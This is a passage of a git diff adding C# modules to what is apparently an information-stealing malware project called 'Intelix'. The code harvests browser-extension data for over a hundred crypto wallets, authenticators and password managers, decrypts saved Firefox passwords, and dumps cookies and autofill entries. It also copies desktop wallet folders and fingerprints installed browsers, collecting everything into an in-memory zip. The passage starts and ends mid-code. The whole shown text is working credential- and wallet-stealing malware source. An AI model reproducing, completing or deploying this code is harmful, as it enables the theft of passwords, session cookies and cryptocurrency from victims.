"\n\n"; + lines.Add(item); + ++counterBrowser.MaskedIban; + } + catch + { + } + }); + zip.AddTextFile("MaskedIbans\\MaskedIbans[" + browsername + "]" + profilename + ".txt", string.Concat(lines)); + } +} diff --git a/New/Intelix.Targets.Browsers/CryptoChromium.cs b/New/Intelix.Targets.Browsers/CryptoChromium.cs new file mode 100644 index 0000000..9f23e2a --- /dev/null +++ b/New/Intelix.Targets.Browsers/CryptoChromium.cs @@ -0,0 +1,155 @@ +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Browsers; + +public class CryptoChromium : ITarget +{ + private readonly List ChromeWalletsDirectories = new List + { + new string[2] { "Trust Wallets", "pknlccmneadmjbkollckpblgaaabameg" }, + new string[2] { "MetaWallet", "pfknkoocfefiocadajpngdknmkjgakdg" }, + new string[2] { "Guarda Wallet", "fcglfhcjfpkgdppjbglknafgfffkelnm" }, + new string[2] { "Exodus", "idkppnahnmmggbmfkjhiakkbkdpnmnon" }, + new string[2] { "JaxxxLiberty", "mhonjhhcgphdphdjcdoeodfdliikapmj" }, + new string[2] { "Atomic Wallet", "bhmlbgebokamljgnceonbncdofmmkedg" }, + new string[2] { "Mycelium", "pidhddgciaponoajdngciiemcflpnnbg" }, + new string[2] { "Coinomi", "blbpgcogcoohhngdjafgpoagcilicpjh" }, + new string[2] { "GreenAddress", "gflpckpfdgcagnbdfafmibcmkadnlhpj" }, + new string[2] { "Edge", "doljkehcfhidippihgakcihcmnknlphh" }, + new string[2] { "BRD", "nbokbjkelpmlgflobbohapifnnenbjlh" }, + new string[2] { "Samourai Wallet", "apjdnokplgcjkejimjdfjnhmjlbpgkdi" }, + new string[2] { "Copay", "ieedgmmkpkbiblijbbldefkomatsuahh" }, + new string[2] { "Bread", "jifanbgejlbcmhbbdbnfbfnlmbomjedj" }, + new string[2] { "KeepKey", "dojmlmceifkfgkgeejemfciibjehhdcl" }, + new string[2] { "Trezor", "jpxupxjxheguvfyhfhahqvxvyqthiryh" }, + new string[2] { "Ledger Live", "pfkcfdjnlfjcmkjnhcbfhfkkoflnhjln" }, + new string[2] { "Ledger Wallet", "hbpfjlflhnmkddbjdchbbifhllgmmhnm" }, + new string[2] { "Bitbox", "ocmfilhakdbncmojmlbagpkjfbmeinbd" }, + new string[2] { "Digital Bitbox", "dbhklojmlkgmpihhdooibnmidfpeaing" }, + new string[2] { "YubiKey", "mammpjaaoinfelloncbbpomjcihbkmmc" }, + new string[2] { "Nifty Wallet", "jbdaocneiiinmjbjlgalhcelgbejmnid" }, + new string[2] { "Math Wallet", "afbcbjpbpfadlkmhmclhkeeodmamcflc" }, + new string[2] { "Coinbase Wallet", "hnfanknocfeofbddgcijnmhnfnkdnaad" }, + new string[2] { "Equal Wallet", "blnieiiffboillknjnepogjhkgnoac" }, + new string[2] { "EVER Wallet", "cgeeodpfagjceefieflmdfphplkenlfk" }, + new string[2] { "Jaxx Liberty", "ocefimbphcgjaahbclemolcmkeanoagc" }, + new string[2] { "BitApp Wallet", "fihkakfobkmkjojpchpfgcmhfjnmnfpi" }, + new string[2] { "Mew CX", "nlbmnnijcnlegkjjpcfjclmcfggfefdm" }, + new string[2] { "GU Wallet", "nfinomegcaccbhchhgflladpfbajihdf" }, + new string[2] { "Guild Wallet", "nanjmdkhkinifnkgdeggcnhdaammmj" }, + new string[2] { "Saturn Wallet", "nkddgncdjgifcddamgcmfnlhccnimig" }, + new string[2] { "Harmony Wallet", "fnnegphlobjdpkhecapkijjdkgcjhkib" }, + new string[2] { "TON Wallet", "nphplpgoakhhjchkkhmiggakijnkhfnd" }, + new string[2] { "OpenMask Wallet", "penjlddjkjgpnkllboccdgccekpkcbin" }, + new string[2] { "MyTonWallet", "fldfpgipfncgndfolcbkdeeknbbbnhcc" }, + new string[2] { "DeWallet", "pnccjgokhbnggghddhahcnaopgeipafg" }, + new string[2] { "TrustWallet", "egjidjbpglichdcondbcbdnbeeppgdph" }, + new string[2] { "NC Wallet", "imlcamfeniaidioeflifonfjeeppblda" }, + new string[2] { "Moso Wallet", "ajkifnllfhikkjbjopkhmjoieikeihjb" }, + new string[2] { "Enkrypt Wallet", "kkpllkodjeloidieedojogacfhpaihoh" }, + new string[2] { "CirusWeb3 Wallet", "kgdijkcfiglijhaglibaidbipiejjfdp" }, + new string[2] { "Martian and Sui Wallet", "efbglgofoippbgcjepnhiblaibcnclgk" }, + new string[2] { "SubWallet", "onhogfjeacnfoofkfgppdlbmlmnplgbn" }, + new string[2] { "Pontem Wallet", "phkbamefinggmakgklpkljjmgibohnba" }, + new string[2] { "Talisman Wallet", "fijngjgcjhjmmpcmkeiomlglpeiijkld" }, + new string[2] { "Kardiachain Wallet", "pdadjkfkgcafgbceimcpbkalnfnepbnk" }, + new string[2] { "Phantom Wallet", "bfnaelmomeimhipmgjnjophhpkkoljpa" }, + new string[2] { "Phantom Wallet", "bfnaelmomeimhlpmgjnjophhpkkoljpa" }, + new string[2] { "Oxygen Wallet", "fhilaheimglignddjgofkcbgekhenbh" }, + new string[2] { "PaliWallet", "mgfffbidihjpoaomajlbgchddlicgpn" }, + new string[2] { "BoltX Wallet", "aodkkagnadcbobfpggnjeongemjbjca" }, + new string[2] { "Liquality Wallet", "kpopkelmapcoipemfendmdghnegimn" }, + new string[2] { "xDefi Wallet", "hmeobnffcmdkdcmlb1gagmfpfboieaf" }, + new string[2] { "Nami Wallet", "ipfcbjknijpeeillifnkikgncikgfhdo" }, + new string[2] { "MaiarDeFi Wallet", "dngmlblcodfobpdpecaadgfbeggfjfnm" }, + new string[2] { "MetaMask Wallet", "nkbihfbeogaeaoehlefnkodbefgpgknn" }, + new string[2] { "MetaMask Wallet", "djclckkglechooblngghdinmeemkbgci" }, + new string[2] { "MetaMask Wallet", "ejbalbakoplchlghecdalmeeeajnimhm" }, + new string[2] { "Goblin Wallet", "mlbafbjadjidk1bhgopoamemfibcpdfi" }, + new string[2] { "Braavos Smart Wallet", "jnlgamecbpmbajjfhmmmlhejkemejdma" }, + new string[2] { "UniSat Wallet", "ppbibelpcjmhbdihakflkdcoccbgbkpo" }, + new string[2] { "OKX Wallet", "mcohilncbfahbmgdjkbpemcciiolgcge" }, + new string[2] { "Manta Wallet", "enabgbdfcbaehmbigakijjabdpdnimlg" }, + new string[2] { "Suku Wallet", "fopmedgnkfpebgllppeddmmochcookhc" }, + new string[2] { "Suiet Wallet", "khpkpbbcccdmmclmpigdgddabeilkdpd" }, + new string[2] { "Koala Wallet", "lnnnmfcpbkafcpgdilckhmhbkkbpkmid" }, + new string[2] { "ExodusWeb3 Wallet", "aholpfdialjgjfhomihkjbmgjidlcdno" }, + new string[2] { "Aurox Wallet", "kilnpioakcdndlodeeceffgjdpojajlo" }, + new string[2] { "Fewcha Move Wallet", "ebfidpplhabeedpnhjnobghokpiioolj" }, + new string[2] { "Carax Demon Wallet", "mdjmfdffdcmnoblignmgpommbefadffd" }, + new string[2] { "Leap Terra Wallet", "aijcbedoijmgnlmjeegjaglmepbmpkpi" }, + new string[2] { "Keplr Wallet", "dmkamcknogkgcdfhhbddcghachkejeap" }, + new string[2] { "Binance Chain Wallet", "fhbohimaelbohpjbbldcngcnapndodjp" }, + new string[2] { "Yoroi Wallet", "ffnbelfdoeiohenkjibnmadjiehjhajb" }, + new string[2] { "Rabby Wallet", "acmacodkjbdgmoleebolmdjonilkdbch" }, + new string[2] { "TokenPocket", "mfgccjchihfkkindfppnaooecgfneiii" }, + new string[2] { "SafePal Extension Wallet", "lgmpcpglpngdoalbgeoldeajfclnhafa" }, + new string[2] { "Magic Eden Wallet", "mkpegjkblkkefacfnmkajcjmabijhclg" }, + new string[2] { "Ronin", "fnjhmkhhmkbjkkabndcnnogagogbneec" }, + new string[2] { "Coin98", "aeachknmefphepccionboohckonoeemg" }, + new string[2] { "TerraStation", "aiifbnbfobpmeekipheeijimdpnlpgpp" }, + new string[2] { "Wombat", "amkmjjmmflddogmhpjloimipbofnfjih" }, + new string[2] { "Nami", "lpfcbjknijpeeillifnkikgncikgfhdo" }, + new string[2] { "XDEFI", "hmeobnfnfcmdkdcmlblgagmfpfboieaf" }, + new string[2] { "Tron", "ibnejdfjmmkpcnlpebklmnkoeoihofec" }, + new string[2] { "Authenticator", "bhghoamapcdpbohphigoooaddinpkbai" }, + new string[2] { "Google Authenticator", "khcodhlfkpmhibicdjjblnkgimdepgnd" }, + new string[2] { "Microsoft Authenticator", "bfbdnbpibgndpjfhonkflpkijfapmomn" }, + new string[2] { "Authy", "gjffdbjndmcafeoehgdldobgjmlepcal" }, + new string[2] { "Duo Mobile", "eidlicjlkaiefdbgmdepmmicpbggmhoj" }, + new string[2] { "OTP Auth", "bobfejfdlhnabgglompioclndjejolch" }, + new string[2] { "FreeOTP", "elokfmmmjbadpgdjmgglocapdckdcpkn" }, + new string[2] { "Aegis Authenticator", "ppdjlkfkedmidmclhakfncpfdmdgmjpm" }, + new string[2] { "LastPass Authenticator", "cfoajccjibkjhbdjnpkbananbejpkkjb" }, + new string[2] { "Dashlane", "flikjlpgnpcjdienoojmgliechmmheek" }, + new string[2] { "Keeper", "gofhklgdnbnpcdigdgkgfobhhghjmmkj" }, + new string[2] { "RoboForm", "hppmchachflomkejbhofobganapojjol" }, + new string[2] { "KeePass", "lbfeahdfdkibininjgejjgpdafeopflb" }, + new string[2] { "KeePassXC", "kgeohlebpjgcfiidfhhdlnnkhefajmca" }, + new string[2] { "Bitwarden", "inljaljiffkdgmlndjkdiepghpolcpki" }, + new string[2] { "NordPass", "njgnlkhcjgmjfnfahdmfkalpjcneebpl" }, + new string[2] { "LastPass", "gabedfkgnbglfbnplfpjddgfnbibkmbb" } + }; + + public void Collect(InMemoryZip zip, Counter counter) + { + Parallel.ForEach(Paths.Chromium, delegate(string browser) + { + if (Directory.Exists(browser)) + { + Parallel.ForEach(Directory.GetDirectories(browser), delegate(string profile) + { + string browsername = Paths.GetBrowserName(browser); + string profilename = Path.GetFileName(profile); + Task.Run(delegate + { + GetChromeWallets(zip, counter, profile, profilename, browsername); + }); + }); + } + }); + } + + private void GetChromeWallets(InMemoryZip zip, Counter counter, string profilePath, string profilename, string browserName) + { + string path = Path.Combine(profilePath, "Local Extension Settings"); + if (!Directory.Exists(path)) + { + return; + } + Dictionary extensionDirs = Directory.EnumerateDirectories(path).ToDictionary((string dir) => Path.GetFileName(dir).ToLowerInvariant(), (string dir) => dir); + Parallel.ForEach(ChromeWalletsDirectories, delegate(string[] walletInfo) + { + string key = walletInfo[1]; + if (extensionDirs.TryGetValue(key, out var value)) + { + zip.AddDirectoryFiles(value, browserName + "_" + profilename + " " + walletInfo[0]); + counter.CryptoChromium.Add(value + " => " + browserName + "_" + profilename + " " + walletInfo[0]); + } + }); + } +} diff --git a/New/Intelix.Targets.Browsers/CryptoGecko.cs b/New/Intelix.Targets.Browsers/CryptoGecko.cs new file mode 100644 index 0000000..370a4d3 --- /dev/null +++ b/New/Intelix.Targets.Browsers/CryptoGecko.cs @@ -0,0 +1,62 @@ +using System.Collections.Generic; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Browsers; + +public class CryptoGecko : ITarget +{ + private readonly List GeckoWalletsDirectories = new List + { + new string[2] { "Metamask Wallet", "7d61b592-e488-4f55-bf12-8d0ae55fd100" }, + new string[2] { "Metamask Wallet", "bb29e575-946e-4e69-b956-f73aec0a9927" }, + new string[2] { "Phantom Wallet", "e212a176-a331-462c-a024-d2f9027f15fc" }, + new string[2] { "Phantom Wallet", "a02b2aab-5dca-4649-93cf-f6a34860fbd5" } + }; + + public void Collect(InMemoryZip zip, Counter counter) + { + Parallel.ForEach(Paths.Gecko, delegate(string browser) + { + if (Directory.Exists(browser)) + { + Parallel.ForEach(Directory.GetDirectories(browser), delegate(string profile) + { + string browsername = Paths.GetBrowserName(browser); + string profilename = Path.GetFileName(profile); + Task.Run(delegate + { + GetGeckoWallets(zip, counter, profile, profilename, browsername); + }); + }); + } + }); + } + + private void GetGeckoWallets(InMemoryZip zip, Counter counter, string profilePath, string profilename, string browserName) + { + string extensionsPath = Path.Combine(profilePath, "storage", "default"); + if (!Directory.Exists(extensionsPath)) + { + return; + } + Parallel.ForEach(GeckoWalletsDirectories, delegate(string[] walletInfo) + { + string text = walletInfo[1]; + string[] directories = Directory.GetDirectories(extensionsPath, "moz-extension+++" + text + "*", SearchOption.TopDirectoryOnly); + foreach (string text2 in directories) + { + try + { + string text3 = browserName + "_" + profilename + " " + walletInfo[0]; + zip.AddDirectoryFiles(text2, text3); + counter.CryptoChromium.Add(text2 + " => " + text3); + } + catch + { + } + } + }); + } +} diff --git a/New/Intelix.Targets.Browsers/Gecko.cs b/New/Intelix.Targets.Browsers/Gecko.cs new file mode 100644 index 0000000..cd621af --- /dev/null +++ b/New/Intelix.Targets.Browsers/Gecko.cs @@ -0,0 +1,199 @@ +using System; +using System.Collections.Concurrent; +using System.IO; +using System.Linq; +using System.Text.RegularExpressions; +using System.Threading.Tasks; +using Intelix.Helper.Data; +using Intelix.Helper.Encrypted; +using Intelix.Helper.Sql; + +namespace Intelix.Targets.Browsers; + +public class Gecko : ITarget +{ + public void Collect(InMemoryZip zip, Counter counter) + { + Parallel.ForEach(Paths.Gecko, delegate(string browser) + { + if (Directory.Exists(browser)) + { + Parallel.ForEach(Directory.GetDirectories(browser), delegate(string profile) + { + ProfileCollect(zip, counter, browser, profile); + }); + } + }); + } + + private void ProfileCollect(InMemoryZip zip, Counter counter, string browser, string profile) + { + _ = browser + "\\Local State"; + string browsername = Paths.GetBrowserName(browser); + string profilename = Path.GetFileName(profile); + Counter.CounterBrowser counterBrowser = new Counter.CounterBrowser(); + counterBrowser.Profile = profile; + counterBrowser.BrowserName = browsername; + Task.WaitAll(Task.Run(delegate + { + Password(zip, counterBrowser, profile, profilename, browsername); + }), Task.Run(delegate + { + Cookies(zip, counterBrowser, profile, profilename, browsername); + }), Task.Run(delegate + { + AutoFill(zip, counterBrowser, profile, profilename, browsername); + })); + if ((long)counterBrowser.Cookies != 0L || (long)counterBrowser.Password != 0L || (long)counterBrowser.CreditCards != 0L || (long)counterBrowser.AutoFill != 0L || (long)counterBrowser.RestoreToken != 0L || (long)counterBrowser.MaskCreditCard != 0L || (long)counterBrowser.MaskedIban != 0L) + { + counter.Browsers.Add(counterBrowser); + } + } + + private void Password(InMemoryZip zip, Counter.CounterBrowser counterBrowser, string profile, string profilename, string browsername) + { + string path = Path.Combine(profile, "logins.json"); + if (!File.Exists(path)) + { + return; + } + string path2 = Path.Combine(profile, "key4.db"); + string path3 = Path.Combine(profile, "key3.db"); + byte[] masterKey = null; + if (File.Exists(path2)) + { + masterKey = NssDumpMasterKey.Key4Database(path2); + } + else if (File.Exists(path3)) + { + masterKey = NssDumpMasterKey.Key3Database(path3); + } + if (masterKey == null && !NSSDecryptor.Initialize(profile)) + { + return; + } + string text = File.ReadAllText(path); + if (string.IsNullOrEmpty(text)) + { + return; + } + MatchCollection matchCollection = Regex.Matches(text, "\"hostname\":\\s*\"(.*?)\".*?\"encryptedUsername\":\\s*\"(.*?)\".*?\"encryptedPassword\":\\s*\"(.*?)\"", RegexOptions.Singleline); + if (matchCollection.Count == 0) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + Parallel.ForEach(matchCollection.Cast(), delegate(Match match) + { + string value = match.Groups[1].Value; + string value2 = match.Groups[2].Value; + string value3 = match.Groups[3].Value; + string text2 = ""; + string text3 = ""; + if (masterKey == null) + { + text2 = NSSDecryptor.Decrypt(value2); + text3 = NSSDecryptor.Decrypt(value3); + } + else + { + Asn1Der asn1Der = new Asn1Der(); + byte[] toParse = Convert.FromBase64String(value2); + byte[] toParse2 = Convert.FromBase64String(value3); + Asn1DerObject asn1DerObject = asn1Der.Parse(toParse); + Asn1DerObject asn1DerObject2 = asn1Der.Parse(toParse2); + byte[] data = asn1DerObject.Objects[0].Objects[1].Objects[1].Data; + byte[] data2 = asn1DerObject.Objects[0].Objects[1].Objects[0].Data; + byte[] data3 = asn1DerObject2.Objects[0].Objects[1].Objects[1].Data; + byte[] data4 = asn1DerObject2.Objects[0].Objects[1].Objects[0].Data; + text2 = TripleDes.DecryptStringDesCbc(masterKey, data, data2); + text3 = TripleDes.DecryptStringDesCbc(masterKey, data3, data4); + } + text2 = (string.IsNullOrEmpty(text2) ? "" : Regex.Replace(text2, "[^\\u0020-\\u007F]", "")); + text3 = (string.IsNullOrEmpty(text3) ? "" : Regex.Replace(text3, "[^\\u0020-\\u007F]", "")); + if (!string.IsNullOrEmpty(value) && !string.IsNullOrEmpty(text2) && !string.IsNullOrEmpty(text3)) + { + lines.Add("Hostname: " + value + "\nUsername: " + text2 + "\nPassword: " + text3 + "\n\n"); + ++counterBrowser.Password; + } + }); + zip.AddTextFile("Passwords\\Passwords_[" + browsername + "]" + profilename + ".txt", string.Join("", lines.ToList())); + } + + private void Cookies(InMemoryZip zip, Counter.CounterBrowser counterBrowser, string profile, string profilename, string browsername) + { + string text = Path.Combine(profile, "cookies.sqlite"); + if (!File.Exists(text)) + { + return; + } + SqLite sSqLite = SqLite.ReadTable(text, "moz_cookies"); + if (sSqLite == null) + { + return; + } + ConcurrentBag linesSanitized = new ConcurrentBag(); + ConcurrentBag linesRaw = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 3); + string value2 = sSqLite.GetValue(i, 4); + string value3 = sSqLite.GetValue(i, 2); + string value4 = sSqLite.GetValue(i, 5); + string value5 = sSqLite.GetValue(i, 6); + string isSecure = sSqLite.GetValue(i, 8); + if (!string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value3) && !string.IsNullOrEmpty(value4) && !string.IsNullOrEmpty(value5)) + { + string secureFlag = (isSecure == "1") ? "TRUE" : "FALSE"; + string sanitizedValue = Regex.Replace(value ?? "", @"[\x00-\x1F\x7F]", ""); + string itemSanitized = value2 + "\tTRUE\t" + value4 + "\t" + secureFlag + "\t" + value5 + "\t" + value3 + "\t" + sanitizedValue + "\n"; + string itemRaw = value2 + "\tTRUE\t" + value4 + "\t" + secureFlag + "\t" + value5 + "\t" + (value ?? "") + "\n"; + linesSanitized.Add(itemSanitized); + linesRaw.Add(itemRaw); + ++counterBrowser.Cookies; + } + } + catch + { + } + }); + string header = "# Netscape HTTP Cookie File\n# This is a generated file! Do not edit.\n\n"; + zip.AddTextFile("Cookies\\Cookies_[" + browsername + "]" + profilename + ".txt", header + string.Join("", linesSanitized.ToList())); + zip.AddTextFile("Cookies\\Cookies_[" + browsername + "]" + profilename + "_raw.txt", header + string.Join("", linesRaw.ToList())); + } + + private void AutoFill(InMemoryZip zip, Counter.CounterBrowser counterBrowser, string profile, string profilename, string browsername) + { + string text = Path.Combine(profile, "formhistory.sqlite"); + if (!File.Exists(text)) + { + return; + } + SqLite sSqLite = SqLite.ReadTable(text, "moz_formhistory"); + if (sSqLite == null) + { + return; + } + ConcurrentBag lines = new ConcurrentBag(); + Parallel.For(0, sSqLite.GetRowCount(), delegate(int i) + { + try + { + string value = sSqLite.GetValue(i, 1); + string value2 = sSqLite.GetValue(i, 2); + if (!string.IsNullOrEmpty(value2) && !string.IsNullOrEmpty(value)) + { + string item = "Name: " + value + "\nValue: " + value2 + "\n\n"; + lines.Add(item); + ++counterBrowser.AutoFill; + } + } + catch + { + } + }); + zip.AddTextFile("AutoFills\\AutoFill_[" + browsername + "]" + profilename + ".txt", string.Join("", lines.ToList())); + } +} diff --git a/New/Intelix.Targets.Browsers/UserAgentGenerator.cs b/New/Intelix.Targets.Browsers/UserAgentGenerator.cs new file mode 100644 index 0000000..cc8d005 --- /dev/null +++ b/New/Intelix.Targets.Browsers/UserAgentGenerator.cs @@ -0,0 +1,91 @@ +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using Intelix.Helper; +using Intelix.Helper.Data; + +namespace Intelix.Targets.Browsers; + +internal class UserAgentGenerator : ITarget +{ + private class BrowserAgent + { + public string Name { get; set; } + + public string UserAgent { get; set; } + } + + private readonly string[] paths = new string[7] + { + "C:\\Program Files\\Opera\\launcher.exe", + "C:\\Program Files\\Apple\\Safari\\Safari.exe", + "C:\\Program Files\\Mozilla Firefox\\firefox.exe", + "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", + "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", + "C:\\Program Files\\BraveSoftware\\Brave-Browser\\Application\\brave.exe", + "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe" + }; + + private readonly string[] names = new string[7] { "Opera", "Safari", "Firefox", "Chrome", "Edge", "Brave", "Yandex" }; + + public void Collect(InMemoryZip zip, Counter counter) + { + string version = WindowsInfo.GetVersion(); + string architecture = WindowsInfo.GetArchitecture(); + List list = new List(); + for (int i = 0; i < paths.Length; i++) + { + string text = ((names[i] == "Chrome") ? GenerateUserAgentChrome(paths[i], version, architecture) : GenerateUserAgent(paths[i], names[i], version, architecture)); + if (!string.IsNullOrEmpty(text)) + { + list.Add(new BrowserAgent + { + Name = names[i], + UserAgent = text + }); + } + } + if (list.Count != 0) + { + int maxName = Math.Max("Browser".Length, list.Max((BrowserAgent a) => a.Name.Length)); + int maxUA = Math.Max("User-Agent".Length, list.Max((BrowserAgent a) => a.UserAgent.Length)); + List list2 = new List + { + "Browser".PadRight(maxName) + " | " + "User-Agent".PadRight(maxUA), + new string('-', maxName + maxUA + 3) + }; + list2.AddRange(list.Select((BrowserAgent a) => a.Name.PadRight(maxName) + " | " + a.UserAgent.PadRight(maxUA))); + zip.AddTextFile("UserAgents.txt", string.Join(Environment.NewLine, list2)); + } + } + + private string GenerateUserAgent(string browserPath, string name, string osVersion, string architecture) + { + if (File.Exists(browserPath)) + { + return "Mozilla/5.0 (Windows NT " + osVersion + "; " + architecture + ") AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36 " + name + "/" + GetBrowserVersion(browserPath); + } + return string.Empty; + } + + private string GenerateUserAgentChrome(string browserPath, string osVersion, string architecture) + { + if (!File.Exists(browserPath)) + { + return string.Empty; + } + string browserVersion = GetBrowserVersion(browserPath); + return "Mozilla/5.0 (Windows NT " + osVersion + "; " + architecture + ") AppleWebKit/537.36 (KHTML, like Gecko) Chrome/" + browserVersion + " Safari/537.36"; + } + + private string GetBrowserVersion(string browserPath) + { + if (!File.Exists(browserPath)) + { + return "Unknown"; + } + return FileVersionInfo.GetVersionInfo(browserPath).FileVersion; + } +} diff --git a/New/Intelix.Targets.Crypto/._CryptoDesktop.cs b/New/Intelix.Targets.Crypto/._CryptoDesktop.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Crypto/._CryptoDesktop.cs differ diff --git a/New/Intelix.Targets.Crypto/._Grabber.cs b/New/Intelix.Targets.Crypto/._Grabber.cs new file mode 100644 index 0000000..bd96d74 Binary files /dev/null and b/New/Intelix.Targets.Crypto/._Grabber.cs differ diff --git a/New/Intelix.Targets.Crypto/CryptoDesktop.cs b/New/Intelix.Targets.Crypto/CryptoDesktop.cs new file mode 100644 index 0000000..34cb2cd --- /dev/null +++ b/New/Intelix.Targets.Crypto/CryptoDesktop.cs @@ -0,0 +1,240 @@ +using System; +using System.Collections.Generic; +using System.IO; +using System.Threading.Tasks; +using Intelix.Helper.Data; +using Microsoft.Win32; + +namespace Intelix.Targets.Crypto; + +public class CryptoDesktop : ITarget +{ + private static readonly List SWalletsDirectories = new List + { + new string[2] + { + "Zcash", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Zcash") + }, + new string[2] + { + "Armory", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Armory") + }, + new string[2] + { + "Bytecoin", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "bytecoin") + }, + new string[2] + { + "Jaxx", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb") + }, + new string[2] + { + "Exodus", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Exodus", "exodus.wallet") + }, + new string[2] + { + "Ethereum", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Ethereum", "keystore") + }, + new string[2] + { + "Electrum", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum", "wallets") + }, + new string[2] + { + "AtomicWallet", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "atomic", "Local Storage", "leveldb") + }, + new string[2] + { + "Atomic", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Atomic", "Local Storage", "leveldb") + }, + new string[2] + { + "Guarda", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Guarda", "Local Storage", "leveldb") + }, + new string[2] + { + "Coinomi", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Coinomi", "Coinomi", "wallets") + }, + new string[2] + { + "Tari", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "com.tari.universe", "app_configs", "mainnet") + }, + new string[2] + { + "Tari", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "com.tari.universe", "wallet", "mainnet", "data", "wallet") + }, + new string[2] + { + "Bitcoin", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Bitcoin", "wallets") + }, + new string[2] + { + "Bitcoin", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Bitcoin", "wallets") + }, + new string[2] + { + "Dash", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "DashCore", "wallets") + }, + new string[2] + { + "Litecoin", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Litecoin", "wallets") + }, + new string[2] + { + "MyMonero", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MyMonero") + }, + new string[2] + { + "Monero", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Monero") + }, + new string[2] + { + "Vertcoin", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Vertcoin") + }, + new string[2] + { + "Groestlcoin", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Groestlcoin") + }, + new string[2] + { + "Komodo", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Komodo") + }, + new string[2] + { + "PIVX", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "PIVX") + }, + new string[2] + { + "BitcoinGold", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "BitcoinGold") + }, + new string[2] + { + "Electrum-LTC", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Electrum-LTC") + }, + new string[2] + { + "Binance", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Binance") + }, + new string[2] + { + "Phantom", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Phantom", "IndexedDB", "file__0.indexeddb.leveldb") + }, + new string[2] + { + "Coin98", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Coin98", "IndexedDB", "file__0.indexeddb.leveldb") + }, + new string[2] + { + "MathWallet", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MathWallet", "IndexedDB", "file__0.indexeddb.leveldb") + }, + new string[2] + { + "LedgerLive", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Ledger Live") + }, + new string[2] + { + "TrezorSuite", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "TrezorSuite") + }, + new string[2] + { + "MyEtherWallet", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MyEtherWallet") + }, + new string[2] + { + "MyCrypto", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MyCrypto") + }, + new string[2] + { + "MetaMask", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "MetaMask", "IndexedDB", "file__0.indexeddb.leveldb") + }, + new string[2] + { + "TrustWallet", + Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "TrustWallet", "IndexedDB", "file__0.indexeddb.leveldb") + } + }; + + private static readonly string[] SWalletsRegistry = new string[3] { "Litecoin", "Dash", "Bitcoin" }; + + public void Collect(InMemoryZip zip, Counter counter) + { + try + { + Parallel.ForEach(SWalletsDirectories, delegate(string[] sw) + { + CopyWalletFromDirectoryTo(sw[1], sw[0], zip, counter); + }); + Parallel.ForEach(SWalletsRegistry, delegate(string sWalletRegistry) + { + CopyWalletFromRegistryTo(sWalletRegistry, zip, counter); + }); + } + catch + { + } + } + + private void CopyWalletFromDirectoryTo(string sWalletDir, string sWalletName, InMemoryZip zip, Counter counter) + { + if (Directory.Exists(sWalletDir)) + { + zip.AddDirectoryFiles(sWalletDir, sWalletName); + counter.CryptoDesktop.Add(sWalletDir + " => " + sWalletName); + } + } + + private void CopyWalletFromRegistryTo(string sWalletRegistry, InMemoryZip zip, Counter counter) + { + try + { + string name = "Software\\" + sWalletRegistry + "\\" + sWalletRegistry + "-Qt"; + string text = Registry.CurrentUser.OpenSubKey(name)?.GetValue("strDataDir")?.ToString(); + if (text != null) + { + string text2 = 